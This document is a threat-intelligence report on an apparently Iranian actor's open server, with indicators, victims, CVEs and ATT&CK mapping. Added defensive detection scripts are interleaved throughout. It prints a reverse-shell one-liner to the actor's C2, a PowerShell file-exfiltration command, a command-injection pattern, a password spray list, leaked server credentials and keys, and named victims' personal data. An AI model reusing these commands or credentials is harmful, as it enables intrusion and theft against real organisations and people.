    Threat Intelligence

    Iranian Threat Actor: Tools, Techniques, IOCs, and IOAs

    James McMurry | March 14, 2026 | 15 min read

    A note on publication timing

    This report was distributed to ThreatHunter.ai subscribers on March 6, 2026. It was not published publicly at that time. We held it for eight days to give defenders who received it first a meaningful head start before the intelligence became widely available.

    We are publishing it now in full, without sanitization, because everything in this report is directly relevant to understanding the Iranian cyber campaign that produced the Stryker wipe on March 11. The pre-positioning TTPs, the Rclone exfiltration to Wasabi, the credential infrastructure, the victim profile. It is all connected. Defenders deserve to see the full picture.

    Server: sdrhi  |  Primary C2: 157.20.182.49

    On March 6, 2026, I was working a lead on an Iranian threat actor's infrastructure when I found an open directory on their operational server. The hostname was sdrhi. The IP was 157.20.182.49. The server was live. Python SimpleHTTP was running on port 8888. The directory was open.

    I read everything.

    What follows is a full technical report on what was there: the tools, the targets, the credentials, the malware, the exploit code, the victims, and the data they had already stolen. Nothing is redacted. These are real indicators from a live operation against real organizations.

    The server was active at the time of analysis. The operational period runs from March 2025 through March 2026. The targeting is Israeli-primary with secondary targeting across Egypt, UAE, Jordan, Saudi Arabia, and Portugal.

    Overview

    Category | Detail
    Custom Tools | 7 scripts and binaries
    CVEs Exploited or Scanned | 11
    Confirmed Compromised Orgs | 6+
    Email Accounts Compromised | 180+ (OWA brute force)
    Israeli IPs Targeted | 280+
    Exfiltrated Data Types | Passports, credit cards, payroll, corporate docs, biometrics
    C2 Infrastructure IPs | 4
    Meterpreter Payloads Generated | 19+
    SOCKS Proxy Tunnels | 6+ simultaneous
    Operator Handle | Sam (tmux sessions: 21sam, 23sam)

    Threat Actor Profile

    Attribute | Detail
    Attribution | Iranian (Farsi-language artifacts, Iranian ISP blocks, targeting profile)
    Operator Handle | Sam (tmux sessions: 21sam, 23sam); multiple operators indicated
    Server Hostname | sdrhi
    Primary C2 IP | 157.20.182.49
    Primary Language | Persian/Farsi (code comments, keyboard layout artifacts)
    Hosting | Germany (de.archive.ubuntu.com apt mirror)
    Operating System | Ubuntu Linux (Python 3.12.3)
    Session Management | tmux (20+ named sessions)
    Workspaces | im/, moz/, jojo/, tanbe/, mine/, sa/, holo/ compartmentalized by operation
    Operational Period | Confirmed active January through March 2026
    Primary Targets | Israel
    Secondary Targets | Egypt, UAE, Jordan, Saudi Arabia, Portugal
    Motivation | Espionage, data theft (PII, financial, corporate), persistent access

    Threat Actor Infrastructure

    IP Address | Role | Evidence
    157.20.182.49 | Primary C2 / Attack Server | All 19 msfvenom LHOST callbacks, reverse shell destination, OWA brute force origin, Nuclei scanning origin, file exfil receiver port 10443. German hosting.
    162.0.230.185 | Secondary Payload Server | Served x.exe on port 8000. Credentials in server.txt: root / G66BqeNV9hn35M8oQb
    194.11.246.101 | FortiOS Exploit Source | Hardcoded in POC_ZZ_1.py WebSocket login frame as source address 194.11.246.101:1338
    18.223.24.218 | Data Exfil (AWS EC2) | AWS EC2 US-East-2. Received stolen credit card data from E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\

    Phishing Infrastructure

    sso.bookairway.com: Phishing site with Let's Encrypt SSL certificate, Apache reverse proxy to Python backend on port 8080.

    DNS Exfiltration Callback

    01d5ed12-3bb2-41b1-9315-2fa7140945e3.dnshook.site: Used for DNS-based data exfiltration (md5sum of payload sent via nslookup).
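    A log check for the callback pattern just described, added here as an example and not code from the report. It assumes a constructed DNS query log of `time client_ip query_name` and looks for three things: queries under the reported callback domain, hash-shaped or UUID-shaped labels of the kind the md5sum-over-nslookup trick produces, and one client generating many distinct names under a single parent domain, which catches the same technique on a domain that is not yet on a blocklist.

```python
import re
from collections import defaultdict

# Assumed log format, constructed for this example: "<time> <client_ip> <query_name>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)$")
CALLBACK_DOMAINS = {"dnshook.site"}          # parent domain reported above
HEX32_RE = re.compile(r"^[0-9a-f]{32}$")     # md5sum output used as a label
UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$")


def parent_domain(qname: str) -> str:
    """Last two labels; good enough as the 'parent' for this check."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def label_reasons(qname: str) -> list:
    labels = qname.rstrip(".").lower().split(".")
    reasons = []
    if parent_domain(qname) in CALLBACK_DOMAINS:
        reasons.append("known callback domain")
    if any(HEX32_RE.match(l) for l in labels):
        reasons.append("32-hex label (hash-shaped)")
    if any(UUID_RE.match(l) for l in labels):
        reasons.append("uuid label")
    return reasons


def detect(lines, max_names_per_parent=20) -> list:
    """Return (client, query_name_or_parent, reasons) hits."""
    hits = []
    names = defaultdict(set)   # (client, parent) -> distinct query names seen
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _, client, qname = m.groups()
        names[(client, parent_domain(qname))].add(qname.lower())
        reasons = label_reasons(qname)
        if reasons:
            hits.append((client, qname, reasons))
    for (client, parent), seen in sorted(names.items()):
        if len(seen) >= max_names_per_parent:
            hits.append((client, parent, ["many distinct names under one parent"]))
    return hits


def sample_lines():
    """Constructed queries: normal traffic, one hash-over-DNS beacon, one chunked run."""
    lines = ["09:00:00 10.0.0.5 mail.example.com",
             "09:00:01 10.0.0.5 d41d8cd98f00b204e9800998ecf8427e."
             "01d5ed12-3bb2-41b1-9315-2fa7140945e3.dnshook.site",
             "09:00:02 10.0.0.7 www.example.org"]
    lines += [f"09:01:{i:02d} 10.0.0.9 chunk{i:02x}.collector.example" for i in range(24)]
    return lines
```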

    File Hashes

    SHA256 | Filename | Description
    95bf653a233a0b8d5be504bf56b6703e7479e54c8f4573947d64baec638833cb | owa.py | Async OWA brute forcer (aiohttp, 100 concurrent)
    54fe2f395a5b255eaac0f88261165982ad1da766b65cde5639257d53242106cd | owa-2.py | Threaded OWA brute forcer with combo mode
    fd6b46d148af22da6163f18ce43b35ebb827cc6e140f03f0f514bc2a6f548743 | POC_ZZ_1.py | CVE-2024-55591 FortiOS exploit (modified watchTowr)
    4150aeab40fb979995e701f78731a0897d06616c7426973cbcf8a18c5c3dc58a | cve.yaml | Nuclei template, CVE-2025-54068 Laravel Livewire RCE
    443fd4bf218cf11df015c5e5f13649011a9754d48831ed0fb6de96ed4907623d | cve-2.yaml | Nuclei template, CVE-2026-24061 telnetd auth bypass
    7ab597ff0b1a5e6916cad1662b49f58231867a1d4fa91a4edf7ecb73c3ec7fe6 | reset.ps1 | Obfuscated PowerShell malware dropper (2.2MB)
    8ca5be8eed3fd564a11689f0ae7343d46f00c633a5ea8275a7c8cd91a095f9f7 | bin | Subfinder binary (Go ELF x86-64, statically linked)
    eae1ae69b6e678229b69b49a3f884ed727a03fa11c25f154cc88785a6924c170 | web.py | Flask file exfiltration receiver (port 10443)
    7745d3a1a5e758bebe01940f3c407d66f5223dbbf9e4c4187536b0bbaabd0bd2 | adbencrypt.exe | PE32, ZKTeco encryption utility
    a90d7d53b0f2f2aab99c19141c5de10b4fdf2818e2860798c836d48ff1c6a117 | Att.exe | PE32, ZKTeco attendance (PECompact2 compressed)
    c790f5f6c08ee61935365cd1631a21e5261f03a04dcb361824573fb1268f5351 | setup.exe | PE32, ZKTeco installer

    Webshell Indicators

    Indicator | Value
    Webshell Type | Neo-reGeorg ASPX tunnel
    Webshell Key | 123QWEasd
    Path Pattern | /aspnet_client/system_web/4_0_30319/nfud.aspx
    Deployed Location 1 | https://mail.sef.pt/aspnet_client/system_web/4_0_30319/nfud.aspx (Portuguese Immigration Service, SEF)
    Deployed Location 2 | https://69.167.160.144/nfud.aspx
    SOCKS Proxy Ports | 1080, 1085, 10800, 10843, 10850, 10555, 10830
    Listener Ports | 443, 4040, 1085

    Credential Artifacts

    Resocks / Revsocks Encryption Keys

    Key / Password | Tool
    bqLe1ch3x53bdWnbOH4yyCLmakBzW0Hne3wM7LI13Kc | Resocks (primary, used 20+ times)
    LVUYcklWVT4X+hIF9GXnACw8HjA39S/VM4cJwXn3km8 | Resocks
    XHEUq0eV8JjQqBa35zag1rw0I+KIWSBtITZOxzg/kkc | Resocks
    89aFTqq2PJBpBXzxD54/aRi5nsDx8dy4QyCaMjFuE0o | Resocks
    SuperSecretPassword | Revsocks password

    Staging Server Credentials

    IP | Username | Password | Source
    162.0.230.185 | root | G66BqeNV9hn35M8oQb | server.txt

    API Keys and Tokens

    Service | Key
    Shodan API Key | MijnMaksNo4GCF6KlnWBbh52VMC47Hxm

    User-Agent string used in scanning: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    Custom Attack Tools

    owa.py: Async OWA Brute Forcer

    Attribute | Detail
    Language | Python 3 (aiohttp, asyncio)
    Concurrency | Up to 100 simultaneous connections via asyncio.Semaphore
    Target Endpoint | /owa/auth.owa
    Success Detection | HTTP redirect Location header to /owa (vs /auth/logon.aspx for failure)
    Features | Progress tracking with ETA, retry logic (3 attempts with backoff), proxy support, Persian-language code comments
    Banner | OWA Fucker
    Output | URL|username|password format to success.txt

    owa-2.py: Threaded OWA Brute Forcer

    Attribute | Detail
    Language | Python 3 (requests, ThreadPoolExecutor)
    Modes | Brute force (-m bf) and combo (-m combo) for paired user:pass lists
    Expired Password Detection | Detects redirect to /auth/expiredpassword.aspx, saves to expiredpassword.txt
    IP Block Detection | Identifies HTTP 400 responses indicating IP-based blocking
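    Detection logic for the password-guessing pattern owa.py and owa-2.py both produce, added here as an example and not code from the report or the actor's tooling. It assumes a constructed access-log line format of `time client_ip method path status redirect_location user` (a reverse proxy or Exchange front end that records the redirect target and the submitted account); the success, failure and expired-password classification mirrors the redirect test the tools key on, so the signal the attacker reads is the one the defender counts.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Assumed log format, constructed for this example (one request per line):
#   <time> <client_ip> <method> <path> <status> <redirect_location> <user>
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+) (\S+)$")
KIND_ATTR = {"failure": "failures", "success": "successes",
             "expired": "expired", "blocked": "blocked"}


@dataclass
class SourceStats:
    failures: int = 0
    successes: int = 0
    expired: int = 0      # /auth/expiredpassword.aspx: the password was right
    blocked: int = 0      # HTTP 400, which owa-2.py treats as IP blocking
    users: set = field(default_factory=set)


def classify(status: int, location: str) -> str:
    """Same test the brute forcers use: redirect to /owa is a hit, /auth/logon.aspx a miss."""
    if status == 400:
        return "blocked"
    if "/auth/expiredpassword.aspx" in location:
        return "expired"
    if "/auth/logon.aspx" in location:
        return "failure"
    if status in (301, 302, 303) and location.rstrip("/").endswith("/owa"):
        return "success"
    return "other"


def aggregate(lines):
    """Per-source counters over POSTs to /owa/auth.owa only."""
    stats = defaultdict(SourceStats)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m[3] != "POST" or not m[4].startswith("/owa/auth.owa"):
            continue
        s = stats[m[2]]
        s.users.add(m[7].lower())
        attr = KIND_ATTR.get(classify(int(m[5]), m[6]))
        if attr:
            setattr(s, attr, getattr(s, attr) + 1)
    return stats


def alerts(stats, fail_threshold=20, spray_users=10):
    """Many failures over many accounts is spraying, over few accounts brute force;
    a success or expired-password hit after a run of failures means a credential is now held."""
    found = []
    for ip, s in sorted(stats.items()):
        if s.failures >= fail_threshold:
            kind = "password_spray" if len(s.users) >= spray_users else "brute_force"
            found.append((ip, kind))
        if s.failures >= 5 and (s.successes or s.expired):
            found.append((ip, "credential_hit_after_failures"))
        if s.blocked:
            found.append((ip, "blocked_attempts"))
    return found


def sample_lines():
    """Constructed traffic: one scripted guesser and one legitimate user."""
    bad, good = "203.0.113.10", "198.51.100.7"
    lines = [f"10:00:{i:02d} {bad} POST /owa/auth.owa 302 /owa/auth/logon.aspx?reason=2 user{i}"
             for i in range(25)]
    lines += [f"10:01:00 {bad} POST /owa/auth.owa 302 /owa/ user7",
              f"10:01:01 {bad} POST /owa/auth.owa 302 /owa/auth/expiredpassword.aspx user9",
              f"10:01:02 {bad} POST /owa/auth.owa 400 - user10",
              f"10:02:00 {good} POST /owa/auth.owa 302 /owa/ alice",
              f"10:02:01 {good} GET /owa/ 200 - alice"]
    return lines
```

    The thresholds are starting points; a source that trips `credential_hit_after_failures` is the one to act on first, because the expired-password case is exactly what owa-2.py files away for later use.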

    web.py: File Exfiltration Server

    Attribute | Detail
    Language | Python 3 (Flask)
    Port | 10443
    Endpoint | POST /success, accepts file uploads, saves with original filename
    Client Command | PowerShell: New-Object System.Net.WebClient; $wc.UploadFile(http://IP:10443/success, filepath)
    Confirmed Exfil | E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\ (credit cards); C:\Users\riyad\desktop\ (full desktop)

    reset.ps1: Obfuscated PowerShell Dropper (2.2MB)

    A heavily obfuscated PowerShell script functioning as a malware loader using Node.js as a Living-off-the-Land Binary.

    Stage | Behavior
    Stage 1 | Creates %USERPROFILE%\AppData\Local\Nodejs\
    Stage 2 | Downloads Node.js v18.17.0 from nodejs.org (legitimate binary used as LOLBin)
    Stage 3 | Adds Node.js directory to user PATH environment variable
    Stage 4 | AES-CBC decrypts hex-encoded embedded payload using hardcoded key and IV
    Stage 5 | Writes decrypted JavaScript to sysuu2etiprun.js
    Stage 6 | Runs npm install for required packages
    Stage 7 | Executes JS payload via downloaded node.exe
    Stage 8 | Autorun mechanism for persistence across reboots

    Obfuscation: Extensive junk variables, random GUIDs, meaningless function names, dead code branches.

    Exploit Code

    POC_ZZ_1.py: FortiOS CVE-2024-55591

    Weaponized version of the watchTowr proof-of-concept for CVE-2024-55591 (FortiOS/FortiProxy authentication bypass via WebSocket). The actor modified this PoC to:

    • Create super_admin accounts: FortiWiFi/FortiWiFi123, FortiSetup, FortiAdmin
    • Add created users to VPN user groups: ssl-vpn-groupamoss, VPN-Users
    • Enumerate existing VPN users and groups
    • Hardcode victim-specific configurations with Israeli employee names: shachar, sigal, amos, sima, lev, gabi, roy
    • Reference Israeli company email: offices@agentek.co.il
    • Include encoded password hashes from compromised FortiGate devices

    Custom Nuclei Templates

    Template | CVE | Target | Type | Severity
    cve.yaml | CVE-2025-54068 | Laravel Livewire v3 | Deserialization RCE | Critical
    cve-2.yaml | CVE-2026-24061 | GNU Inetutils telnetd | Auth Bypass to root | Critical (9.8)

    Meterpreter Payloads

    19 Meterpreter payloads generated via msfvenom, all calling back to 157.20.182.49:443:

    Payload Name | Type | Format
    shell.elf | linux/x64/meterpreter/reverse_tcp | ELF
    2026.elf | linux/x64/shell_reverse_tcp | ELF
    999.elf | linux/x64/meterpreter/reverse_tcp | ELF
    666.elf | linux/x64/meterpreter_reverse_tcp | ELF
    1.elf | linux/x64/meterpreter_reverse_tcp | ELF
    0.elf | linux/x64/meterpreter_reverse_tcp | ELF
    last.elf | linux/x64/meterpreter_reverse_https | ELF
    zip.elf | Multiple types tested | ELF
    aspx.aspx | windows/x64/meterpreter_reverse_https | ASPX

    CVEs Exploited or Scanned

    CVE | Product | Severity | Activity | Confirmed Targets
    CVE-2024-55591 | FortiOS / FortiProxy | Critical 9.8 | Active exploitation, creates super_admin accounts, adds VPN users | Multiple Israeli FortiGate devices
    CVE-2024-23113 | FortiOS (format string) | Critical | Two exploit repos cloned, PoC executed against 212.29.200.149 | 1+ confirmed
    CVE-2026-1281 | Ivanti EPMM | Critical | Mass scanning via custom Nuclei template against 5,304 Shodan targets | 5 confirmed: 185.55.15.173, 49.255.190.4, 84.72.235.18, 86.51.13.69, 88.151.16.232
    CVE-2025-54068 | Laravel Livewire v3 | Critical | Custom Nuclei template for deserialization RCE | 9 confirmed
    CVE-2025-34291 | Langflow | Critical | Mass scanning against target list | 50+ confirmed
    CVE-2025-52691 | SmarterMail | Critical | Mass scanning against target list | 50+ confirmed
    CVE-2025-9316 | N-able N-Central | Medium | Mass scanning plus active WebSocket RCE exploitation | 50+ scanned, 3+ actively exploited
    CVE-2025-68613 | N8N | Unknown | Nuclei scanning | Unknown
    CVE-2025-47813 | Unknown (loginok.html) | Medium | Mass scanning | 50+ confirmed
    CVE-2026-24061 | GNU Inetutils telnetd | Critical 9.8 | Custom Nuclei template for auth bypass | 56 targets in ips.txt
    N-Central WS RCE | N-able N-Central | Critical | WebSocket command injection via hax[$(cmd)] payload | 3+ actively exploited

    Confirmed Victims and Impact

    Confirmed Compromised Organizations

    Organization | Domain / IP | Country | Impact
    EgyptAir (Riyadh Station) | email.egyptair.com | Egypt / Saudi Arabia | Full data exfiltration: passports, visas, payroll, credit card data (Amex), corporate documents, ZKTeco biometric DB, SGS records. Path: E:\DATA\PEACE2\Personnel_Share\
    Bavaria Group Egypt | mail.bavaria.com.eg | Egypt | 37 OWA accounts compromised with passwords P@ssw0rd and 123456
    Intercom Enterprises | mail.intercom.com.eg | Egypt | 143+ OWA accounts compromised; 50+ expired password accounts
    Sino Tharwa Group | mail.sinotharwa.com.eg | Egypt | Expired password credential hits
    Portuguese Immigration (SEF) | mail.sef.pt | Portugal | Neo-reGeorg webshell on Exchange server for persistent access and tunneling
    Unknown | 69.167.160.144 | Unknown | Neo-reGeorg webshell deployed
    Multiple FortiGate victims | Various Israeli IPs | Israel | Admin accounts created, VPN users added via CVE-2024-55591

    Targeted Organizations (Recon / Scanning / Brute Force)

    Organization | Domain / IP | Country | Activity
    NMDC Group | mail.nmdc-group.com | UAE | OWA + SMTP brute force, full AD username enumeration (77 admin accounts)
    Terem Medical Centers | mail.terem.com | Israel | OWA brute force, full AD user enumeration (123 accounts)
    GoHost | gohost.co.il | Israel | OWA brute force
    Jewish Agency | jewishagency.org | Israel | Subdomain enumeration
    Nefesh B'Nefesh | nbn.org.il | Israel | Subdomain enumeration
    Yahel Israel | yahelisrael.com | Israel | Subdomain enumeration
    Terrogence | terrogence.com | Israel | Subdomain enumeration (Israeli intelligence firm)
    Salam Palestine | salampalestine.org | Palestine | Subdomain enumeration
    Clearview AI | clearview.ai | USA | Subdomain enumeration + Nuclei scanning
    Jordanian Government | webmail.gov.jo | Jordan | Probed
    280+ Israeli OWA servers | Various 62.90.x, 84.110.x, 51.x, 212.x | Israel | Mass OWA brute force campaigns
    95 SMS/Telecom providers | Various (domains.txt) | Israel/Global | Reconnaissance of Israeli SMS infrastructure

    Data Exfiltration Evidence

    EgyptAir Riyadh Station: Complete Data Theft

    The threat actor's webserver (http://157.20.182.49:8888/webserver/) was hosting exfiltrated data from EgyptAir's Riyadh maintenance station. Data was exfiltrated using PowerShell WebClient.UploadFile() commands found in up.txt, targeting both the primary C2 (157.20.182.49:10443) and an AWS instance (ec2-18-223-24-218.us-east-2:443).

    Data Category | Files | Sensitivity
    Credit Card Data | Contents of E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\ | Critical, PCI violation
    Employee Passports | Passport scans: Abu Rehab, Hassan Sami, Youssef Zeidan, Mohamed Ahmed | Critical, PII
    Employee Visas | Saudi visa documents with phone numbers | High, PII
    National ID Cards | Personal ID card documents (Arabic) | Critical, PII
    Salary / Payroll | Monthly transport allowances for 7 named employees, annual salary statement 2021-2022 | High, Financial PII
    Financial Records | Daily revenue, July 2025 revenue, airport receipts, insurance records, compensations | High, Corporate confidential
    Corporate Documents | Company mail forms, discharge forms (EN/AR), cancellation letters, damage reports | Medium, Corporate
    Biometric Data | Complete ZKTeco time and attendance system (setup.exe, Att.exe, encrypted DBs, .dbf files) | Critical, Biometric PII
    SGS Records | Saudi Ground Services data spanning 2019-2025 | High, Corporate
    Bank Reports | Alinma Bank report (Saudi bank) | High, Financial
    WhatsApp Media | 4 images + 1 video from employee phones (Aug-Nov 2025) | Medium, Personal
    Desktop Contents | Full recursive contents of C:\Users\riyad\desktop\ | High, Unknown scope

    Cloud-to-Cloud Exfiltration

    Rclone was used to copy ERPBackup data from Wasabi cloud storage (wasabbi:wasabirclone/ERPBackup) to Put.io (putio:/iiitdEDUin). The actor had access to an organization's ERP backup in Wasabi and transferred it to a personal Put.io account for persistent offline access.

    TTPs: MITRE ATT&CK Mapping

    Technique | Tactic | Name | Evidence
    T1595.002 | Reconnaissance | Vulnerability Scanning | Mass Nuclei scanning against Shodan-harvested targets: Ivanti EPMM (5,304), N-Central, Langflow, SmarterMail, N8N, FortiGate
    T1593.002 | Reconnaissance | Search Open Technical Databases | Shodan queries: title:'Ivanti User Portal', http.favicon.hash:1983356674, http.favicon.hash:362091310
    T1589.001 | Reconnaissance | Gather Victim Identity: Credentials | Username enumeration of AD domains: NMDC, NMDCDOM, terem, EgyptAir (200+ accounts each)
    T1583.001 | Resource Dev | Acquire Infra: Domains | sso.bookairway.com, phishing domain with Let's Encrypt SSL
    T1583.003 | Resource Dev | Acquire Infra: VPS | 157.20.182.49 (Germany), 162.0.230.185, AWS EC2 18.223.24.218
    T1587.001 | Resource Dev | Develop Capabilities: Malware | Custom OWA brute forcers, reset.ps1 dropper, web.py exfil server
    T1587.004 | Resource Dev | Develop Capabilities: Exploits | Modified CVE-2024-55591 PoC, custom Nuclei templates
    T1190 | Initial Access | Exploit Public-Facing Application | CVE-2024-55591, CVE-2026-1281, CVE-2025-54068, CVE-2025-34291, CVE-2025-52691, N-Central WS RCE, CVE-2026-24061
    T1110.001 | Initial Access | Brute Force: Password Guessing | Mass OWA brute forcing: mail.bavaria.com.eg (37 hits), mail.intercom.com.eg (143+ hits)
    T1110.004 | Initial Access | Brute Force: Credential Stuffing | OWA combo mode (-m combo) pairing harvested user:pass lists
    T1566.002 | Initial Access | Phishing: Spearphishing Link | sso.bookairway.com phishing infrastructure
    T1059.001 | Execution | PowerShell | reset.ps1 dropper: AES decryption, Node.js download, JS payload execution; PowerShell WebClient for data exfil
    T1059.007 | Execution | JavaScript | Decrypted JS payload (sysuu2etiprun.js) executed via downloaded Node.js runtime
    T1059.004 | Execution | Unix Shell | bash -i >& /dev/tcp/157.20.182.49/9001 0>&1
    T1203 | Execution | Exploitation for Client Execution | FortiOS WebSocket command injection, N-Central hax[$(command)] injection
    T1505.003 | Persistence | Web Shell | Neo-reGeorg ASPX webshell (nfud.aspx) at mail.sef.pt and 69.167.160.144
    T1136.001 | Persistence | Create Account: Local | FortiOS exploit creates FortiWiFi (super_admin), FortiSetup, FortiAdmin; SSH user asuedulimit
    T1547 | Persistence | Boot/Logon Autostart | reset.ps1 persists Node.js payload as autorun
    T1110 | Credential Access | Brute Force | Custom OWA brute forcers, SMTP brute forcing via Patator against mail.nmdc-group.com:587
    T1110.003 | Credential Access | Password Spraying | P@ssw0rd, 123456, Welcome@123 sprayed across hundreds of accounts
    T1557 | Credential Access | Adversary-in-the-Middle | Responder tool present for LLMNR/NBT-NS/MDNS credential harvesting
    T1071.001 | C2 | Web Protocols | Neo-reGeorg SOCKS tunneling over HTTPS through webshells
    T1572 | C2 | Protocol Tunneling | Resocks/Revsocks encrypted reverse SOCKS, Neo-reGeorg, ICMP tunneling
    T1573.001 | C2 | Encrypted Channel: Symmetric | AES-encrypted PowerShell payload, Resocks encrypted tunnels with pre-shared keys
    T1090.002 | C2 | External Proxy | Multiple SOCKS proxy layers on ports 1080, 1085, 10800, 10843, 10850, 10555, 10830
    T1219 | C2 | Remote Access Software | Custom RDP C2 server (./server binary in rdp/c2 directory) on ports 443, 12345, 9999
    T1095 | C2 | Non-Application Layer Protocol | ICMP tunneling tools (icmp and app_linux binaries) for C2
    T1567.002 | Exfiltration | Exfil Over Cloud Storage | Rclone: Wasabi (wasabbi:wasabirclone/ERPBackup) to Put.io (putio:/iiitdEDUin)
    T1048.003 | Exfiltration | Exfil Over Alternative Protocol | DNS exfiltration via dnshook.site
    T1041 | Exfiltration | Exfil Over C2 Channel | HTTP file upload via web.py Flask server (PowerShell WebClient.UploadFile)
    T1560 | Exfiltration | Archive Collected Data | ZIP archives of exfiltrated data

    Appendix A: Password Spray List (Top 50)

    P@ssw0rd        P@ssw0rd123      123456           Password1        Welcome@123
    admin@123       P@ssw0rd1        Welcome@1        admin123         Aa123456
    P@ssw0rd2024    P@ssw0rd2025     March@2025       March@2026       October@2024
    October@2025    December@2026    Welcome1         Password         12345
    123123          P@ssw0rd12       P@ssw0rd11       L3tm31n          abc123
    1qazZAQ!        qwer1234         Passw0rd         Password@123     Admin@123
    Admin@1234      P@$w0rd         P@$w0rd1        Ch@nge#1         Ch@nge1#
    Welcome@2024    Welcome@2021     Jan@2025         Berlin@2026      Honda@2026
    P@kistan786     Cloud@393        Oracle@3535      Helpdesk@123     Support@1234
    Pass@123456     password         12345678         123456789        Aa12345@

    Appendix B: Target IP Ranges (Israeli Focus)

    IP Range | ISP / Owner | Count
    62.90.x.x | Bezeq International | 20+
    84.110.x.x | Bezeq | 15+
    51.x.x.x | Various cloud providers (OVH, AWS) | 50+
    212.x.x.x | Various Israeli ISPs | 20+
    147.235.x.x | Israeli hosting | 10+
    192.116.x.x / 192.117.x.x | Israeli academic/enterprise | 10+
    82.80.x.x / 82.81.x.x / 82.166.x.x | Israeli ISPs | 15+
    213.8.x.x | Israeli networks | 10+
    31.154.x.x | Israeli networks | 10+
    185.x.x.x | Various hosting | 15+

    The ips.txt file contains 56 telnet (port 23) targets for CVE-2026-24061 exploitation, spanning Egyptian (41.x.x.x, 197.x.x.x) and Israeli IP ranges.

    Recommendations

    Immediate Actions

    • Block attacker infrastructure: 157.20.182.49, 162.0.230.185, 194.11.246.101, 18.223.24.218
    • Block phishing domain: sso.bookairway.com
    • Block DNS exfiltration domain: *.dnshook.site
    • Search all Exchange servers for Neo-reGeorg webshells: nfud.aspx in /aspnet_client/ paths
    • Audit FortiGate admin accounts for unauthorized users: FortiWiFi, FortiSetup, FortiAdmin
    • Force password reset for any account using passwords from the spray list above
    • Review OWA authentication logs for brute force patterns from the identified attacker IPs
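    One way to carry out the webshell search above, using the path pattern from the Webshell Indicators table; this is an added example, not a tool from the report. It walks a web root, flags the reported filename anywhere, and flags any server-executable file under an aspnet_client directory on the assumption that Exchange only ships static client assets there, recording a SHA256 for each finding. The sample tree it builds is constructed, with placeholder contents.

```python
import hashlib
import tempfile
from pathlib import Path

# Server-side extensions that IIS will execute. The aspnet_client tree is assumed
# to hold only static client assets (.js, .css, images), so any of these under it
# is a finding regardless of name.
EXEC_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".soap"}
KNOWN_NAMES = {"nfud.aspx"}  # filename reported for this actor's Neo-reGeorg tunnel


def sha256_of(path: Path) -> str:
    """Hash for triage and for sharing the finding with other defenders."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hunt(web_root) -> list:
    """Walk an IIS/Exchange web root; return suspicious files with reasons."""
    root = Path(web_root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        dirs = {p.lower() for p in rel.parts[:-1]}
        reasons = []
        if path.name.lower() in KNOWN_NAMES:
            reasons.append("known webshell filename")
        if "aspnet_client" in dirs and path.suffix.lower() in EXEC_EXT:
            reasons.append("server-side script under aspnet_client")
        if reasons:
            findings.append({"path": rel.as_posix(), "sha256": sha256_of(path),
                             "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_root() -> str:
    """Constructed web root: legitimate files plus planted look-alikes whose
    contents are placeholder text, not real webshell code."""
    root = Path(tempfile.mkdtemp(prefix="exch_root_"))
    files = {
        "aspnet_client/system_web/4_0_30319/WebForms.js": "// legitimate static script",
        "aspnet_client/system_web/4_0_30319/nfud.aspx": "placeholder: reported path pattern",
        "aspnet_client/hidden/x.ashx": "placeholder: unexpected handler",
        "owa/auth/logon.aspx": "placeholder: legitimate OWA page",
        "nfud.aspx": "placeholder: known name outside aspnet_client",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return str(root)


if __name__ == "__main__":
    for f in hunt(build_sample_root()):
        print(f["sha256"][:16], f["path"], "; ".join(f["reasons"]))
```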

    Patch Priority

    Product | CVE(s) | Priority
    FortiOS / FortiProxy | CVE-2024-55591, CVE-2024-23113 | CRITICAL, Active exploitation confirmed
    Ivanti EPMM | CVE-2026-1281 | CRITICAL, 5,304 targets scanned, 5+ confirmed vulnerable
    Laravel Livewire v3 | CVE-2025-54068 | CRITICAL, 9 confirmed vulnerable
    Langflow | CVE-2025-34291 | CRITICAL, 50+ confirmed vulnerable
    SmarterMail | CVE-2025-52691 | CRITICAL, 50+ confirmed vulnerable
    N-able N-Central | CVE-2025-9316 + WebSocket RCE | HIGH, Active exploitation confirmed
    GNU Inetutils telnetd | CVE-2026-24061 | HIGH, Auth bypass to root

    ThreatHunter.ai is an 18-year SDVOSB cybersecurity company. This intelligence was collected from open-source analysis of exposed threat actor infrastructure. No systems were accessed beyond what was openly published by the actor. If your organization is listed above and has not yet been notified, contact us.